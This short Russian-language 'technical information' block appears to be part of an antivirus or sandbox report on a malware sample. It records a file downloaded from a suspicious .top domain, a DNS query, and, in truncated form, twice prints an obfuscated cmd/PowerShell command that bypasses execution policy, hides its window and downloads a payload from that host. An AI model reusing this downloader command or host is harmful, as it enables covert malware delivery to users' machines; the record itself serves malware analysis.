Техническая информация
- http://mondayhelthc.top/read.php?f=404 как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POwErS^Hel^L.exe -ex^eC^u^Tionpol^icY ^bypa^sS -N^opRO^F^iLE^ ^-^Win^D^owstY^L^e Hid^de^N ^(^NeW-^ObJEC^t^ Sy^steM.^neT^.W^ebC^LI^ENT)^.d^OWn^lo^adf^I^le('http://mondayhelthc.top/r...
- DNS ASK mo####helthc.top
- '<SYSTEM32>\cmd.exe' /c "POwErS^Hel^L.exe -ex^eC^u^Tionpol^icY ^bypa^sS -N^opRO^F^iLE^ ^-^Win^D^owstY^L^e Hid^de^N ^(^NeW-^ObJEC^t^ Sy^steM.^neT^.W^ebC^LI^ENT)^.d^OWn^lo^adf^I^le('http://mondayhelthc.top/r... (со скрытым окном)